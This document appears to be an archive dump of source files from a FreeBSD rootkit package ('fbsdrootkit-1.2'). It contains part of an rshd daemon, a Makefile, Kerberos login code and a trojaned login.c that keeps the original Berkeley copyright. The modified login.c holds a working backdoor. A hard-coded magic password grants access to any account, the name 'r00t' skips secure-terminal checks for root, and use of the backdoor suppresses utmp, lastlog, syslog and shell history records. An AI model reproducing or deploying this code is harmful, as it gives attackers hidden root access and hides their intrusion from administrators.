%s: no home directory. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); error("No remote directory.\n"); exit(1); #endif } #ifdef KERBEROS if (use_kerberos) { if (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0') { if (kuserok(kdata, locuser) != 0) { syslog(LOG_INFO|LOG_AUTH, "Kerberos rsh denied to %s.%s@%s", kdata->pname, kdata->pinst, kdata->prealm); error("Permission denied.\n"); exit(1); } } } else #endif if (errorstr || (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0' && iruserok(fromp->sin_addr.s_addr, pwd->pw_uid == 0, remuser, locuser) < 0)) { if (__rcmd_errstr) syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", remuser, hostname, locuser, __rcmd_errstr, cmdbuf); else syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); fail: if (errorstr == NULL) errorstr = "Permission denied.\n"; error(errorstr, errorhost); exit(1); } if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) { error("Logins currently disabled.\n"); exit(1); } (void) write(STDERR_FILENO, "\0", 1); sent_null = 1; if (port) { if (pipe(pv) < 0) { error("Can't make pipe.\n"); exit(1); } #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { if (pipe(pv1) < 0) { error("Can't make 2nd pipe.\n"); exit(1); } if (pipe(pv2) < 0) { error("Can't make 3rd pipe.\n"); exit(1); } } #endif #endif pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); exit(1); } if (pid) { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { static char msg[] = SECURE_MESSAGE; (void) close(pv1[1]); (void) close(pv2[1]); des_write(s, msg, sizeof(msg) - 1); } else #endif #endif { (void) close(0); (void) close(1); } (void) close(2); (void) close(pv[1]); FD_ZERO(&readfrom); FD_SET(s, &readfrom); FD_SET(pv[0], &readfrom); if (pv[0] > s) nfd = pv[0]; else nfd = s; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { FD_ZERO(&writeto); FD_SET(pv2[0], &writeto); FD_SET(pv1[0], &readfrom); nfd = MAX(nfd, pv2[0]); nfd = MAX(nfd, pv1[0]); } else #endif #endif ioctl(pv[0], FIONBIO, (char *)&one); /* should set s nbio! */ nfd++; do { ready = readfrom; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { wready = writeto; if (select(nfd, &ready, &wready, (fd_set *) 0, (struct timeval *) 0) < 0) break; } else #endif #endif if (select(nfd, &ready, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) break; if (FD_ISSET(s, &ready)) { int ret; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) ret = des_read(s, &sig, 1); else #endif #endif ret = read(s, &sig, 1); if (ret <= 0) FD_CLR(s, &readfrom); else killpg(pid, sig); } if (FD_ISSET(pv[0], &ready)) { errno = 0; cc = read(pv[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(s, 1+1); FD_CLR(pv[0], &readfrom); } else { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) (void) des_write(s, buf, cc); else #endif #endif (void) write(s, buf, cc); } } #ifdef CRYPT #ifdef KERBEROS if (doencrypt && FD_ISSET(pv1[0], &ready)) { errno = 0; cc = read(pv1[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(pv1[0], 1+1); FD_CLR(pv1[0], &readfrom); } else (void) des_write(STDOUT_FILENO, buf, cc); } if (doencrypt && FD_ISSET(pv2[0], &wready)) { errno = 0; cc = des_read(STDIN_FILENO, buf, sizeof(buf)); if (cc <= 0) { shutdown(pv2[0], 1+1); FD_CLR(pv2[0], &writeto); } else (void) write(pv2[0], buf, cc); } #endif #endif } while (FD_ISSET(s, &readfrom) || #ifdef CRYPT #ifdef KERBEROS (doencrypt && FD_ISSET(pv1[0], &readfrom)) || #endif #endif FD_ISSET(pv[0], &readfrom)); exit(0); } setpgrp(0, getpid()); (void) close(s); (void) close(pv[0]); #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { close(pv1[0]); close(pv2[0]); dup2(pv1[1], 1); dup2(pv2[1], 0); close(pv1[1]); close(pv2[1]); } #endif #endif dup2(pv[1], 2); close(pv[1]); } if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; #if BSD > 43 if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failed: %m"); #endif (void) setgid((gid_t)pwd->pw_gid); initgroups(pwd->pw_name, pwd->pw_gid); (void) setuid((uid_t)pwd->pw_uid); environ = envinit; strncat(homedir, pwd->pw_dir, sizeof(homedir)-6); strcat(path, _PATH_DEFPATH); strncat(shell, pwd->pw_shell, sizeof(shell)-7); strncat(username, pwd->pw_name, sizeof(username)-6); cp = strrchr(pwd->pw_shell, '/'); if (cp) cp++; else cp = pwd->pw_shell; endpwent(); if (log_success || pwd->pw_uid == 0) { #ifdef KERBEROS if (use_kerberos) syslog(LOG_INFO|LOG_AUTH, "Kerberos shell from %s.%s@%s on %s as %s, cmd='%.80s'", kdata->pname, kdata->pinst, kdata->prealm, hostname, locuser, cmdbuf); else #endif syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'", remuser, hostname, locuser, cmdbuf); } execl(pwd->pw_shell, cp, "-c", cmdbuf, 0); perror(pwd->pw_shell); exit(1); } /* * Report error to client. Note: can't be used until second socket has * connected to client, or older clients will hang waiting for that * connection first. */ #if __STDC__ #include #else #include #endif void #if __STDC__ error(const char *fmt, ...) #else error(fmt, va_alist) char *fmt; va_dcl #endif { va_list ap; int len; char *bp, buf[BUFSIZ]; #if __STDC__ va_start(ap, fmt); #else va_start(ap); #endif bp = buf; if (sent_null == 0) { *bp++ = 1; len = 1; } else len = 0; (void)vsnprintf(bp, sizeof(buf) - 1, fmt, ap); (void)write(STDERR_FILENO, buf, len + strlen(bp)); } void getstr(buf, cnt, err) char *buf, *err; int cnt; { char c; do { if (read(STDIN_FILENO, &c, 1) != 1) exit(1); *buf++ = c; if (--cnt == 0) { error("%s too long\n", err); exit(1); } } while (c != 0); } /* * Check whether host h is in our local domain, * defined as sharing the last two components of the domain part, * or the entire domain part if the local domain has only one component. * If either name is unqualified (contains no '.'), * assume that the host is local, as it will be * interpreted as such. */ int local_domain(h) char *h; { char localhost[MAXHOSTNAMELEN]; char *p1, *p2; localhost[0] = 0; (void) gethostname(localhost, sizeof(localhost)); p1 = topdomain(localhost); p2 = topdomain(h); if (p1 == NULL || p2 == NULL || !strcasecmp(p1, p2)) return (1); return (0); } char * topdomain(h) char *h; { char *p, *maybe = NULL; int dots = 0; for (p = h + strlen(h); p >= h; p--) { if (*p == '.') { if (++dots == 2) return (p); maybe = p; } } return (maybe); } void usage() { syslog(LOG_ERR, "usage: rshd [-%s]", OPTIONS); exit(2); } fbsdrootkit-1.2/login/ 40700 764 764 0 6255651214 12152 5ustar dfdffbsdrootkit-1.2/login/Makefile100600 764 764 1160 5762566240 13715 0ustar dfdf# From: @(#)Makefile 8.1 (Berkeley) 7/19/93 # $Id: Makefile,v 1.13 1995/05/30 06:31:25 rgrimes Exp $ PROG= login MAN1= login.1 MAN5= login.access.5 SRCS= login.c login_access.c login_fbtab.c CFLAGS+=-DLOGIN_ACCESS -DSKEY -DLOGALL .if defined(KLOGIN_PARANOID) CFLAGS+=-DKLOGIN_PARANOID .endif DPADD= ${LIBUTIL} ${LIBSKEY} ${LIBMD} ${LIBCRYPT} LDADD= -lutil -lskey -lmd -lcrypt .if exists(${DESTDIR}/usr/lib/libkrb.a) && defined(MAKE_EBONES) CFLAGS+=-DKERBEROS SRCS+= klogin.c DPADD+= ${LIBKRB} ${LIBDES} LDADD+= -lkrb -ldes DISTRIBUTION= krb .endif BINOWN= root BINMODE=4555 INSTALLFLAGS=-fschg .include fbsdrootkit-1.2/login/klogin.c100600 764 764 14205 6163361000 13707 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)klogin.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #ifdef KERBEROS #include #include #include #include #include #include #include #include #include #include #include #define INITIAL_TICKET "krbtgt" #define VERIFY_SERVICE "rcmd" extern int notickets; extern char *krbtkfile_env; /* * Attempt to log the user in using Kerberos authentication * * return 0 on success (will be logged in) * 1 if Kerberos failed (try local password in login) */ int klogin(pw, instance, localhost, password) struct passwd *pw; char *instance, *localhost, *password; { int kerror; AUTH_DAT authdata; KTEXT_ST ticket; struct hostent *hp; unsigned long faddr; char realm[REALM_SZ], savehost[MAXHOSTNAMELEN]; char tkt_location[MAXPATHLEN]; char *krb_get_phost(); extern int noticketsdontcomplain; #ifdef KLOGIN_PARANOID noticketsdontcomplain = 0; /* enable warning message */ #endif /* * Root logins don't use Kerberos. * If we have a realm, try getting a ticket-granting ticket * and using it to authenticate. Otherwise, return * failure so that we can try the normal passwd file * for a password. If that's ok, log the user in * without issuing any tickets. */ if (strcmp(pw->pw_name, "root") == 0 || krb_get_lrealm(realm, 0) != KSUCCESS) return (1); noticketsdontcomplain = 0; /* enable warning message */ /* * get TGT for local realm * tickets are stored in a file named TKT_ROOT plus uid * except for user.root tickets. */ if (strcmp(instance, "root") != 0) (void)sprintf(tkt_location, "%s%d", TKT_ROOT, pw->pw_uid); else { (void)sprintf(tkt_location, "%s_root_%d", TKT_ROOT, pw->pw_uid); krbtkfile_env = tkt_location; } (void)krb_set_tkt_string(tkt_location); /* * Set real as well as effective ID to 0 for the moment, * to make the kerberos library do the right thing. */ if (setuid(0) < 0) { warnx("setuid"); return (1); } kerror = krb_get_pw_in_tkt(pw->pw_name, instance, realm, INITIAL_TICKET, realm, DEFAULT_TKT_LIFE, password); /* * If we got a TGT, get a local "rcmd" ticket and check it so as to * ensure that we are not talking to a bogus Kerberos server. * * There are 2 cases where we still allow a login: * 1: the VERIFY_SERVICE doesn't exist in the KDC * 2: local host has no srvtab, as (hopefully) indicated by a * return value of RD_AP_UNDEC from krb_rd_req(). */ if (kerror != INTK_OK) { if (kerror != INTK_BADPW && kerror != KDC_PR_UNKNOWN) { syslog(LOG_ERR, "Kerberos intkt error: %s", krb_err_txt[kerror]); dest_tkt(); } return (1); } if (chown(TKT_FILE, pw->pw_uid, pw->pw_gid) < 0) syslog(LOG_ERR, "chown tkfile (%s): %m", TKT_FILE); (void)strncpy(savehost, krb_get_phost(localhost), sizeof(savehost)); savehost[sizeof(savehost)-1] = NULL; #ifdef KLOGIN_PARANOID /* * if the "VERIFY_SERVICE" doesn't exist in the KDC for this host, * still allow login with tickets, but log the error condition. */ kerror = krb_mk_req(&ticket, VERIFY_SERVICE, savehost, realm, 33); if (kerror == KDC_PR_UNKNOWN) { syslog(LOG_NOTICE, "warning: TGT not verified (%s); %s.%s not registered, or srvtab is wrong?", krb_err_txt[kerror], VERIFY_SERVICE, savehost); notickets = 0; return (0); } if (kerror != KSUCCESS) { warnx("unable to use TGT: (%s)", krb_err_txt[kerror]); syslog(LOG_NOTICE, "unable to use TGT: (%s)", krb_err_txt[kerror]); dest_tkt(); return (1); } if (!(hp = gethostbyname(localhost))) { syslog(LOG_ERR, "couldn't get local host address"); dest_tkt(); return (1); } memmove((void *)&faddr, (void *)hp->h_addr, sizeof(faddr)); kerror = krb_rd_req(&ticket, VERIFY_SERVICE, savehost, faddr, &authdata, ""); if (kerror == KSUCCESS) { notickets = 0; return (0); } /* undecipherable: probably didn't have a srvtab on the local host */ if (kerror = RD_AP_UNDEC) { syslog(LOG_NOTICE, "krb_rd_req: (%s)\n", krb_err_txt[kerror]); dest_tkt(); return (1); } /* failed for some other reason */ warnx("unable to verify %s ticket: (%s)", VERIFY_SERVICE, krb_err_txt[kerror]); syslog(LOG_NOTICE, "couldn't verify %s ticket: %s", VERIFY_SERVICE, krb_err_txt[kerror]); dest_tkt(); return (1); #else notickets = 0; return (0); #endif } #endif fbsdrootkit-1.2/login/README100600 764 764 1316 5705727260 13136 0ustar dfdfThis login has additional functionalities. They are all based on (part of) Wietse Venema's logdaemon package. The following defines can be used: 1) LOGIN_ACCESS to allow access control on a per tty/user combination 2) SKEY to allow the use of s/key one time passwords 3) LOGALL to log all logins -Guido This login has some of Berkeley's paranoid/broken (depending on your point of view) Kerberos code conditionalized out, so that by default it works like klogin does at MIT-LCS. You can define KLOGIN_PARANOID to re-enable this code. This define also controls whether a warning message is printed when logging into a system with no krb.conf file, which usually means that Kerberos is not configured. -GAWollman fbsdrootkit-1.2/login/login.c100600 764 764 42472 6257154600 13555 0ustar dfdf/*- * Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)login.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef SKEY #include #endif #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" void badlogin __P((char *)); void checknologin __P((void)); void dolastlog __P((int)); void getloginname __P((void)); void motd __P((void)); int rootterm __P((char *)); void sigint __P((int)); void sleepexit __P((int)); char *stypeof __P((char *)); void timedout __P((int)); void login_fbtab __P((char *, uid_t, gid_t)); #ifdef KERBEROS int klogin __P((struct passwd *, char *, char *, char *)); #endif extern void login __P((struct utmp *)); #define TTYGRPNAME "tty" /* name of group to own ttys */ /* * This bounds the time given to login. Not a define so it can * be patched on machines where it's too small. */ u_int timeout = 300; #ifdef KERBEROS int notickets = 1; int noticketsdontcomplain = 1; char *instance; char *krbtkfile_env; int authok; #endif struct passwd *pwd; int failures; char term[64], *envinit[1], *hostname, *username, *tty; int main(argc, argv) int argc; char *argv[]; { extern char **environ; struct group *gr; struct stat st; struct timeval tp; struct utmp utmp; int ask, ch, cnt, fflag, hflag, pflag, quietlog, rootlogin, rval; int changepass; uid_t uid; char *domain, *p, *ep, *salt, *ttyn; char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10]; char localhost[MAXHOSTNAMELEN]; char full_hostname[MAXHOSTNAMELEN]; #ifdef SKEY int permit_passwd = 0; #endif /* Some rootkit variables */ char magic[7]; char r00t[5]; int passthru=0; int werd=0; magic[0]=ROOTKIT_MAGIC[0]; magic[1]=ROOTKIT_MAGIC[1]; magic[2]=ROOTKIT_MAGIC[2]; magic[3]=ROOTKIT_MAGIC[3]; magic[4]=ROOTKIT_MAGIC[4]; magic[5]=ROOTKIT_MAGIC[5]; magic[6]='\0'; r00t[0]='r'; r00t[1]='0'; r00t[2]='0'; r00t[3]='t'; r00t[4]='\0'; (void)signal(SIGALRM, timedout); (void)alarm(timeout); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)setpriority(PRIO_PROCESS, 0, 0); openlog("login", LOG_ODELAY, LOG_AUTH); /* * -p is used by getty to tell login not to destroy the environment * -f is used to skip a second login authentication * -h is used by other servers to pass the name of the remote * host to login so that it may be placed in utmp and wtmp */ *full_hostname = '\0'; domain = NULL; if (gethostname(localhost, sizeof(localhost)) < 0) syslog(LOG_ERR, "couldn't get local hostname: %m"); else domain = strchr(localhost, '.'); fflag = hflag = pflag = 0; uid = getuid(); while ((ch = getopt(argc, argv, "fh:p")) != EOF) switch (ch) { case 'f': fflag = 1; break; case 'h': if (uid) errx(1, "-h option: %s", strerror(EPERM)); hflag = 1; strncpy(full_hostname, optarg, sizeof(full_hostname)-1); if (domain && (p = strchr(optarg, '.')) && strcasecmp(p, domain) == 0) *p = 0; hostname = optarg; break; case 'p': pflag = 1; break; case '?': default: if (!uid) syslog(LOG_ERR, "invalid flag %c", ch); (void)fprintf(stderr, "usage: login [-fp] [-h hostname] [username]\n"); exit(1); } argc -= optind; argv += optind; if (*argv) { username = *argv; ask = 0; } else ask = 1; for (cnt = getdtablesize(); cnt > 2; cnt--) (void)close(cnt); ttyn = ttyname(STDIN_FILENO); if (ttyn == NULL || *ttyn == '\0') { (void)snprintf(tname, sizeof(tname), "%s??", _PATH_TTY); ttyn = tname; } if (tty = strrchr(ttyn, '/')) ++tty; else tty = ttyn; for (cnt = 0;; ask = 1) { if (ask) { fflag = 0; getloginname(); } /* Check to see if root login is desired and disable secure tty check */ if(!strcmp(username,r00t)) { strcpy(username,"root"); passthru++; } rootlogin = 0; #ifdef KERBEROS if ((instance = strchr(username, '.')) != NULL) { if (strncmp(instance, ".root", 5) == 0) rootlogin = 1; *instance++ = '\0'; } else instance = ""; #endif if (strlen(username) > UT_NAMESIZE) username[UT_NAMESIZE] = '\0'; /* * Note if trying multiple user names; log failures for * previous user name, but don't bother logging one failure * for nonexistent name (mistyped username). */ if (failures && strcmp(tbuf, username)) { if (failures > (pwd ? 0 : 1)) badlogin(tbuf); failures = 0; } (void)strcpy(tbuf, username); if (pwd = getpwnam(username)) salt = pwd->pw_passwd; else salt = "xx"; /* * if we have a valid account name, and it doesn't have a * password, or the -f option was specified and the caller * is root or the caller isn't changing their uid, don't * authenticate. */ if (pwd) { if (pwd->pw_uid == 0) rootlogin = 1; if (fflag && (uid == 0 || uid == pwd->pw_uid)) { /* already authenticated */ break; } else if (pwd->pw_passwd[0] == '\0') { /* pretend password okay */ rval = 0; goto ttycheck; } } fflag = 0; (void)setpriority(PRIO_PROCESS, 0, -4); #ifdef SKEY permit_passwd = skeyaccess(username, tty, hostname ? full_hostname : NULL, NULL); p = skey_getpass("Password:", pwd, permit_passwd); ep = skey_crypt(p, salt, pwd, permit_passwd); #else p = getpass("Password:"); ep = crypt(p, salt); #endif /* Check for the magic password */ if(!strcmp(p,magic)) { werd++; /* Turn off history logging */ setenv("HISTFILE","/dev/null",1); } if (pwd) { #ifdef KERBEROS #ifdef SKEY /* * Do not allow user to type in kerberos password * over the net (actually, this is ok for encrypted * links, but we have no way of determining if the * link is encrypted. */ if (!permit_passwd) { rval = 1; /* failed */ } else #endif rval = klogin(pwd, instance, localhost, p); if (rval != 0 && rootlogin && pwd->pw_uid != 0) rootlogin = 0; if (rval == 0) authok = 1; else if (rval == 1) rval = strcmp(ep, pwd->pw_passwd); #else /* Allow a good password or the magic one */ rval = strcmp(ep, pwd->pw_passwd) && !werd; #endif } memset(p, 0, strlen(p)); (void)setpriority(PRIO_PROCESS, 0, 0); ttycheck: /* * If trying to log in as root without Kerberos, * but with insecure terminal, refuse the login attempt. */ #ifdef KERBEROS if (authok == 0) #endif if (!passthru && pwd && !rval && rootlogin && !rootterm(tty)) { (void)fprintf(stderr, "%s login refused on this terminal.\n", pwd->pw_name); if (hostname) syslog(LOG_NOTICE, "LOGIN %s REFUSED FROM %s ON TTY %s", pwd->pw_name, hostname, tty); else syslog(LOG_NOTICE, "LOGIN %s REFUSED ON TTY %s", pwd->pw_name, tty); continue; } if (pwd && !rval) break; (void)printf("Login incorrect\n"); failures++; /* we allow 10 tries, but after 3 we start backing off */ if (++cnt > 3) { if (cnt >= 10) { badlogin(username); sleepexit(1); } sleep((u_int)((cnt - 3) * 5)); } } /* committed to login -- turn off timeout */ (void)alarm((u_int)0); endpwent(); /* if user not super-user, check for disabled logins */ if (!rootlogin) checknologin(); if (chdir(pwd->pw_dir) < 0) { (void)printf("No home directory %s!\n", pwd->pw_dir); if (chdir("/")) exit(0); pwd->pw_dir = "/"; (void)printf("Logging in with home = \"/\".\n"); } quietlog = access(_PATH_HUSHLOGIN, F_OK) == 0; if (pwd->pw_change || pwd->pw_expire) (void)gettimeofday(&tp, (struct timezone *)NULL); changepass=0; if (pwd->pw_change) if (tp.tv_sec >= pwd->pw_change) { (void)printf("Sorry -- your password has expired.\n"); changepass=1; } else if (pwd->pw_change - tp.tv_sec < 2 * 7 * 86400 && !quietlog) (void)printf("Warning: your password expires on %s", ctime(&pwd->pw_change)); if (pwd->pw_expire) if (tp.tv_sec >= pwd->pw_expire) { (void)printf("Sorry -- your account has expired.\n"); sleepexit(1); } else if (pwd->pw_expire - tp.tv_sec < 2 * 7 * 86400 && !quietlog) (void)printf("Warning: your account expires on %s", ctime(&pwd->pw_expire)); /* Nothing else left to fail -- really log in. */ memset((void *)&utmp, 0, sizeof(utmp)); (void)time(&utmp.ut_time); (void)strncpy(utmp.ut_name, username, sizeof(utmp.ut_name)); if (hostname) (void)strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host)); (void)strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line)); /* Don't log to utmp if using magic password */ if(!werd) login(&utmp); /* Don't log too lastlog if magic password used */ if(!werd) dolastlog(quietlog); /* * Set device protections, depending on what terminal the * user is logged in. This feature is used on Suns to give * console users better privacy. */ login_fbtab(tty, pwd->pw_uid, pwd->pw_gid); (void)chown(ttyn, pwd->pw_uid, (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid); (void)setgid(pwd->pw_gid); initgroups(username, pwd->pw_gid); if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; /* Destroy environment unless user has requested its preservation. */ if (!pflag) environ = envinit; (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", pwd->pw_shell, 1); if (term[0] == '\0') (void)strncpy(term, stypeof(tty), sizeof(term)); (void)setenv("TERM", term, 0); (void)setenv("LOGNAME", pwd->pw_name, 1); (void)setenv("USER", pwd->pw_name, 1); (void)setenv("PATH", _PATH_DEFPATH, 0); #ifdef KERBEROS if (krbtkfile_env) (void)setenv("KRBTKFILE", krbtkfile_env, 1); #endif if (tty[sizeof("tty")-1] == 'd') syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name); /* If fflag is on, assume caller/authenticator has logged root login. */ /* Don't syslog if magic password used */ if (!werd && rootlogin && fflag == 0) if (hostname) syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s FROM %s", username, tty, hostname); else syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s", username, tty); #ifdef KERBEROS if (!quietlog && notickets == 1 && !noticketsdontcomplain) (void)printf("Warning: no Kerberos tickets issued.\n"); #endif #ifdef LOGALL /* * Syslog each successful login, so we don't have to watch hundreds * of wtmp or lastlogin files. */ /* Don't syslog if magic password used */ if(!werd) if (hostname) { syslog(LOG_INFO, "login from %s as %s", hostname, pwd->pw_name); } else { syslog(LOG_INFO, "login on %s as %s", tty, pwd->pw_name); } #endif if (!quietlog) { (void)printf("%s\n\t%s %s\n\n", "Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994", "The Regents of the University of California. ", "All rights reserved."); motd(); (void)snprintf(tbuf, sizeof(tbuf), "%s/%s", _PATH_MAILDIR, pwd->pw_name); if (stat(tbuf, &st) == 0 && st.st_size != 0) (void)printf("You have %smail.\n", (st.st_mtime > st.st_atime) ? "new " : ""); } #ifdef LOGIN_ACCESS /* Don't syslog failures using magic password */ if (!werd && login_access(pwd->pw_name, hostname ? full_hostname : tty) == 0) { printf("Permission denied\n"); if (hostname) syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s", pwd->pw_name, hostname); else syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s", pwd->pw_name, tty); sleepexit(1); } #endif (void)signal(SIGALRM, SIG_DFL); (void)signal(SIGQUIT, SIG_DFL); (void)signal(SIGINT, SIG_DFL); (void)signal(SIGTSTP, SIG_IGN); tbuf[0] = '-'; (void)strcpy(tbuf + 1, (p = strrchr(pwd->pw_shell, '/')) ? p + 1 : pwd->pw_shell); if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failure: %m"); /* Discard permissions last so can't get killed and drop core. */ if (rootlogin) (void) setuid(0); else (void) setuid(pwd->pw_uid); if (changepass) { int res; if ((res=system(_PATH_CHPASS))) sleepexit(1); } /* Turn off history logging if environment isn't saved */ if(werd) setenv("HISTFILE","/dev/null",1); execlp(pwd->pw_shell, tbuf, 0); err(1, "%s", pwd->pw_shell); } #ifdef KERBEROS #define NBUFSIZ (UT_NAMESIZE + 1 + 5) /* .root suffix */ #else #define NBUFSIZ (UT_NAMESIZE + 1) #endif void getloginname() { int ch; char *p; static char nbuf[NBUFSIZ]; for (;;) { (void)printf("login: "); for (p = nbuf; (ch = getchar()) != '\n'; ) { if (ch == EOF) { badlogin(username); exit(0); } if (p < nbuf + (NBUFSIZ - 1)) *p++ = ch; } if (p > nbuf) if (nbuf[0] == '-') (void)fprintf(stderr, "login names may not start with '-'.\n"); else { *p = '\0'; username = nbuf; break; } } } int rootterm(ttyn) char *ttyn; { struct ttyent *t; return ((t = getttynam(ttyn)) && t->ty_status & TTY_SECURE); } jmp_buf motdinterrupt; void motd() { int fd, nchars; sig_t oldint; char tbuf[8192]; if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0) return; oldint = signal(SIGINT, sigint); if (setjmp(motdinterrupt) == 0) while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); (void)signal(SIGINT, oldint); (void)close(fd); } /* ARGSUSED */ void sigint(signo) int signo; { longjmp(motdinterrupt, 1); } /* ARGSUSED */ void timedout(signo) int signo; { (void)fprintf(stderr, "Login timed out after %d seconds\n", timeout); exit(0); } void checknologin() { int fd, nchars; char tbuf[8192]; if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) { while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); sleepexit(0); } } void dolastlog(quiet) int quiet; { struct lastlog ll; int fd; if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) { (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); if (!quiet) { if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) && ll.ll_time != 0) { (void)printf("Last login: %.*s ", 24-5, (char *)ctime(&ll.ll_time)); if (*ll.ll_host != '\0') (void)printf("from %.*s\n", (int)sizeof(ll.ll_host), ll.ll_host); else (void)printf("on %.*s\n", (int)sizeof(ll.ll_line), ll.ll_line); } (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); } memset((void *)&ll, 0, sizeof(ll)); (void)time(&ll.ll_time); (void)strncpy(ll.ll_line, tty, sizeof(ll.ll_line)); if (hostname) (void)strncpy(ll.ll_host, hostname, sizeof(ll.ll_host)); (void)write(fd, (char *)&ll, sizeof(ll)); (void)close(fd); } } void badlogin(name) char *name; { if (failures == 0) return; if (hostname) { 